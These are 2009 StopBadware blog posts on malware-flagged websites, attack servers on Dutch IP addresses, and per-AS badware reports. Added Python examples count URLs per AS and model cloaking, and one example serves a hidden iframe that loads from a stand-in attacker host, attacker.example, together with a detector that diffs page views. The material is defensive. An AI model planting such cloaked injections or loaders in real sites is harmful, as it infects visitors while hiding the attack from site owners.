Prominent Chinese site flagged for badware

Posted by Maxim Weinstein Tue, 27 Oct 2009 21:14:36 GMT

It was reported today that a website of the official newspaper of the Chinese government, The People’s Daily, was flagged for malware by Google. The paper apparently complained that Google was maliciously flagging the site due to the paper’s criticism of Google Library. Google China denied the allegation, pointing out that the site was flagged by automated anti-malware systems, not based on content. As reported, the Google statement makes a small mistake in indicating that StopBadware.org provided the software for this automated system. In fact, Google’s Safe Browsing team developed the system themselves. For more information, see the relevant section of our FAQ.

The important lesson of this incident is that legitimate websites, whether operated by individuals or by large government-sponsored organizations, can fall victim to badware. Indeed, in China, where infection rates have historically been high, we hope this will serve as a wake-up call to website owners, hosting companies, and other parties about the need to secure their sites and platforms.


More on .NL attacks

Posted by Oliver Day Fri, 23 Oct 2009 21:03:24 GMT

Last week I wrote about a new string of attacks we noticed pointing to servers in the Netherlands. Over the weekend I found some public sources which show a more complete list of the attack sites which share the list of IP addresses. Hosts-file.net has a decent compilation of each of the five addresses we listed:

AS | IP | BGP Prefix | AS Name
16265 | 85.17.138.27 | 85.17.0.0/16 | LEASEWEB LEASEWEB AS
16265 | 85.17.237.5 | 85.17.0.0/16 | LEASEWEB LEASEWEB AS
15703 | 87.233.139.100 | 87.233.128.0/18 | TRUESERVER
15435 | 217.23.4.76 | 217.23.0.0/20 | KABELFOON
15435 | 217.23.5.27 | 217.23.0.0/20 | KABELFOON

Interestingly, the domains don’t overlap in every instance, so not every one of the domains listed is necessarily serving badware. Google, our data partner, says that over 12,000 websites have been infected that point back to one of the sites on these 5 IP addresses. I’m still working on obtaining a full list of all the infected sites to analyze the distribution of the victims. My assumption is that certain web hosts were harder hit than others, but this is entirely speculation until I can analyze the full list.

If you have any information regarding these attacks please feel free to write us at contact <at> stopbadware <dot> org

 

New StopBadware data reports

Posted by Maxim Weinstein Thu, 22 Oct 2009 20:11:09 GMT

We are pleased to unveil two new data reports, based on the data provided by Google and Sunbelt Software to our Badware Website Clearinghouse and on information that we’ve pulled from Team Cymru’s public IP-to-ASN mapping service. One report lists the 50 Autonomous Systems (ASes) hosting the greatest number of reported badware URLs. Set up like a stock ticker chart, it also displays the percent daily change in the number of URLs reported on each AS and the 52-week highs and lows for each AS. (The data starts in July 2009, so it does not yet reflect a full 52 weeks.) See the Top 50 report here. There is also a link to it from the left-side navigation bar on the StopBadware.org home page.

The second report, available for any individual AS in our Clearinghouse, shows a graph of the number of reported badware URLs hosted by the AS over time. See an example here, search for an AS by number here, or click more info next to any AS in the Top 50 report for detail on that AS.

Both reports are updated daily and offer the ability to download the data in CSV format. We also wrote up a brief explanation of how to interpret the data in the reports.
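As an added example (not StopBadware’s own code), here is how per-AS counts like those in the Top 50 report can be produced from IP-to-ASN data in the pipe-delimited layout that Team Cymru’s whois service returns, which is the same layout as the five rows in the .NL post above. The prefix table reuses those five rows; the victim URLs, their resolved IPs and the two days of reports are constructed for the example.

```python
"""Added example (not StopBadware's own code): build per-AS counts of reported
badware URLs from Team Cymru-style IP-to-ASN data, as the Top 50 report does.

The ASN rows copy the format of Team Cymru's whois service; the victim URLs,
IPs and dates below are constructed for the example."""
import ipaddress
from collections import Counter

# Constructed sample in the "AS | IP | BGP Prefix | AS Name" layout that
# Team Cymru's bulk whois service returns (rows from the .NL post above).
CYMRU_OUTPUT = """\
AS      | IP               | BGP Prefix          | AS Name
16265   | 85.17.138.27     | 85.17.0.0/16        | LEASEWEB LEASEWEB AS
16265   | 85.17.237.5      | 85.17.0.0/16        | LEASEWEB LEASEWEB AS
15703   | 87.233.139.100   | 87.233.128.0/18     | TRUESERVER
15435   | 217.23.4.76      | 217.23.0.0/20       | KABELFOON
15435   | 217.23.5.27      | 217.23.0.0/20       | KABELFOON
"""

# Constructed daily reports: (date, reported URL, IP the host resolved to).
REPORTS = [
    ("2009-10-21", "http://shop.example/cart.php", "85.17.200.1"),
    ("2009-10-21", "http://blog.example/", "85.17.9.9"),
    ("2009-10-21", "http://forum.example/", "217.23.4.200"),
    ("2009-10-22", "http://shop.example/cart.php", "85.17.200.1"),
    ("2009-10-22", "http://forum.example/", "217.23.4.200"),
    ("2009-10-22", "http://news.example/", "217.23.10.10"),
    ("2009-10-22", "http://other.example/", "198.51.100.7"),  # no prefix in table
]


def parse_cymru(text):
    """Return {network: (asn, as_name)} from pipe-delimited Cymru output,
    skipping the header row and any line that does not parse."""
    prefixes = {}
    for line in text.splitlines():
        fields = [f.strip() for f in line.split("|")]
        if len(fields) != 4 or not fields[0].isdigit():
            continue
        asn, _ip, prefix, name = fields
        try:
            net = ipaddress.ip_network(prefix, strict=False)
        except ValueError:
            continue
        prefixes[net] = (int(asn), name)
    return prefixes


PREFIXES = parse_cymru(CYMRU_OUTPUT)


def lookup_asn(ip, prefixes=PREFIXES):
    """Longest-prefix match of an IP against the known BGP prefixes;
    returns (asn, as_name) or None when no prefix covers the address."""
    addr = ipaddress.ip_address(ip)
    best = None
    for net, info in prefixes.items():
        if addr in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, info)
    return best[1] if best else None


def count_by_asn(reports, day):
    """Number of reported badware URLs per ASN on one day. Unmapped IPs are
    tallied under ASN 0 so they are not silently dropped from the totals."""
    counts = Counter()
    for date, _url, ip in reports:
        if date != day:
            continue
        hit = lookup_asn(ip)
        counts[hit[0] if hit else 0] += 1
    return counts


def daily_change(today, yesterday):
    """Percent change per ASN; None where there was no count the day before."""
    change = {}
    for asn in set(today) | set(yesterday):
        prev, cur = yesterday.get(asn, 0), today.get(asn, 0)
        change[asn] = None if prev == 0 else round((cur - prev) * 100.0 / prev, 1)
    return change


def top_asns(reports, day, limit=50):
    """Rows like the Top 50 report: (asn, as_name, count), largest first."""
    names = {asn: name for asn, name in PREFIXES.values()}
    counts = count_by_asn(reports, day)
    return [(asn, names.get(asn, "unknown"), n)
            for asn, n in counts.most_common(limit)]


if __name__ == "__main__":
    today = count_by_asn(REPORTS, "2009-10-22")
    yesterday = count_by_asn(REPORTS, "2009-10-21")
    change = daily_change(today, yesterday)
    for asn, name, n in top_asns(REPORTS, "2009-10-22"):
        print(asn, name, n, change[asn])
```

Two details matter when doing this at scale: the prefix match has to be longest-prefix, not first-match, because Cymru returns the most specific announced prefix and two rows can nest; and hosts whose IP falls outside every known prefix should be counted somewhere visible (ASN 0 above) rather than dropped, or the Top 50 totals will quietly undercount. In a real run the rows would come from the whois.cymru.com bulk interface rather than being pasted in.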

We hope that both reports will be valuable to researchers, network operators, and others interested in observing web-based malware trends. Please let us know what you think by sending us a note at contact @ stopbadware dot org.


A light diversion

Posted by Maxim Weinstein Fri, 23 Oct 2009 13:47:16 GMT

Security firm Comodo offers this self-promoting but rather humorous spoof of the cable TV show Intervention. In this case, the addict is a laptop that is addicted to malware. (Also available here.)





Google offers webmasters more malware details

Posted by Maxim Weinstein Thu, 22 Oct 2009 14:22:44 GMT

Google’s Webmaster Tools has, for quite some time, provided verified website owners with a partial list of pages on their site where Google found badware during its scanning. Unfortunately, site owners were often frustrated to learn that Google had detected something on a page without being told what the problem actually was. That frustration should be largely eliminated now that Webmaster Tools has added an experimental Labs feature called "Malware Details," which at least in some cases provides more information to the site owner, as shown in this screenshot from the blog post announcing the feature:

This is a big step forward and should make life much easier for the website owners whose sites have fallen victim to malware. Now, if we can just get Google to share this data with us, so we can better help users who have submitted review requests…

[Update: I just saw that the same blog post mentions another feature, Fetch as Googlebot, which displays a particular page as seen by Google’s web crawler. This also, as noted in the post, can be helpful in diagnosing malware, as it allows the site owner to see how Google’s view of the page differs from the user’s own view. One cause of such a difference is malware that responds differently to different User-Agent or Referer strings in the HTTP request, so the owner’s own browser gets a clean page while the crawler, or a visitor arriving from a search result, gets the injected one.]
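The User-Agent/Referer difference is easy to see in code. The following is an added example, not Google’s feature or code from the post: a constructed model of a compromised page that hides its injected iframe from the owner’s direct visits, plus a check that diffs two views of the page the way a site owner would compare the Fetch as Googlebot output with their own browser’s view. The page markup, the header values and the attacker URL (attacker.example) are all made up for the example.

```python
"""Added example (not Google's or StopBadware's code): a constructed model of a
compromised page that cloaks its injected iframe, and a check that diffs the
crawler's view of the page against the owner's direct view, the comparison that
Fetch as Googlebot makes possible. Markup, headers and URLs are made up."""
from html.parser import HTMLParser

CLEAN_PAGE = (
    "<html><body><h1>Welcome</h1>"
    '<script src="/js/site.js"></script>'
    "</body></html>"
)
# Hypothetical injected loader; a real one would point at the attack server.
INJECTED = '<iframe src="http://attacker.example/load.php" width="0" height="0"></iframe>'


def serve(headers):
    """Model of server-side cloaking as the post describes it: one URL returns
    different content depending on User-Agent and Referer. This constructed
    variant hides the injection only from a direct browser visit (no Referer,
    browser UA), which is what the site owner typing the URL looks like."""
    h = {k.lower(): v for k, v in headers.items()}
    ua = h.get("user-agent", "").lower()
    referer = h.get("referer", "")
    direct_browser_visit = referer == "" and "mozilla" in ua and "bot" not in ua
    if direct_browser_visit:
        return CLEAN_PAGE
    return CLEAN_PAGE.replace("</body>", INJECTED + "</body>")


class LoaderCollector(HTMLParser):
    """Collect (tag, url) for elements that pull in external content."""
    WATCH = {"script", "iframe", "object", "embed"}

    def __init__(self):
        super().__init__()
        self.found = set()

    def handle_starttag(self, tag, attrs):
        if tag in self.WATCH:
            a = dict(attrs)
            src = a.get("src") or a.get("data")
            if src:
                self.found.add((tag, src))


def loaders(html):
    """Set of (tag, url) loaders found in one view of the page."""
    p = LoaderCollector()
    p.feed(html)
    p.close()
    return p.found


def compare_views(view_a, view_b):
    """Return (only_in_a, only_in_b): loaders present in one view but not the
    other. Either direction is suspicious; a clean site serves the same set."""
    a, b = loaders(view_a), loaders(view_b)
    return a - b, b - a


# Constructed request headers for the three visitors being compared.
GOOGLEBOT = {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"}
OWNER = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; rv:3.5) Gecko/20090824 Firefox/3.5"}
SEARCH_VISITOR = {**OWNER, "Referer": "http://www.google.com/search?q=shop+example"}


def check_cloaking():
    """Diff Google's view against the owner's direct visit, then confirm that a
    search-referred visitor gets the same injection Google saw."""
    google_view = serve(GOOGLEBOT)
    owner_view = serve(OWNER)
    only_google, only_owner = compare_views(google_view, owner_view)
    visitor_view = serve(SEARCH_VISITOR)
    return {
        "hidden_from_owner": only_google,
        "only_owner_sees": only_owner,
        "visitor_matches_google": loaders(visitor_view) == loaders(google_view),
    }


if __name__ == "__main__":
    for key, value in check_cloaking().items():
        print(key, value)
```

The practical check is the diff, not the model: fetch the page from a clean machine with a browser User-Agent and no Referer, fetch it again with a search-engine Referer (or take Google’s copy from Fetch as Googlebot), and list the script, iframe, object and embed sources that appear in one response but not the other. Anything that shows up only in the crawler or search-visitor view is the injection the owner cannot see from their own browser.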
